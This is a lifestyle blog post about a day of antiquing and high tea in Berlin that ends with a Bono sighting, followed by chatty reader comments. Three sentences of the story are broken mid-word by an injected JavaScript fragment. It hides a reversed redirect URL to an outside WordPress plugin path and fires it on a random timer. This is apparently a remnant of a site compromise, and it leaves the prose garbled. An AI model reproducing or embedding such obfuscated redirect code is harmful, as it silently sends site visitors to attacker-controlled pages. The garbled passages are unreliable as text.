Fashion Stylist Kelli Djulus of A Rendez-Vous-With-Style & I were doing a Diva Tour of the Berliner Trödelmarkt. The itinerary was set: breakfast from the Bäckerei, the afternoon spent hard-core antiquing on the Straße des 17 Juni with a quick bite of Bratwurst, followed by a relaxing and indulgent High Tea at Berlin’s best hotel, The Adlon.

Everything went according toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to plan. All in all, not bad for a day’s work. I guess we could say that Kelli “did find what she was looking for.”

But as much as we plan, some things are simply beyond our span of control. After sipping Jasmin Pearl and munching on perfectly baked scones with strawberry jam and clotted cream, we wandered out the front door of this Leading Hotel of the World “toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to where the streets have no name” only toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to discover that the news of our whereabouts had leaked!

  1. Victorian Cobweb,
Indeed we're having a ball!! And you don't know the half of it – a day after seeing Bono we popped into Queen Rania of Jordan and her entourage! It's been a divalicious week!

  2. BritGal,
Truly it was a fab day, that no amount of planning could have ever coordinated!!! And we were sooo UP CLOSE and Personal with Bono, but alas, I must confess he didn't even make eye contact with us! He chose a little girl nearby to give his attention!

  3. OMG, I'd have been elbowing everyone aside for a photo op!!!! Sorry the crowds weren't for you girls, but I love how you told the story!

  4. Kalyn,
I've still not seen him in concert, but I'm walking around the house humming, "I still haven't found what I'm looking for…" He's in Berlin for concert now… hmm, wonder if I can still get tickets?

  5. Amazing!! I can't believe how close you got to him! I saw him in concert once in New York – what an outstanding show.

  6. Back in the day, a friend worked for his label in NYC & garnered myslef an invite to a cocktail thing for him, whilst I was visiting. A true highlight of my life when she intro'd me to him as a poet & when she mentioned I had lived in Africa for 4 years that was it!! We chatted intently for a while, me the girl of the world & Bono discussing African affairs & the need to educate for change. I swear as I have no idea how I kept forming sentences but it was memorable!!!
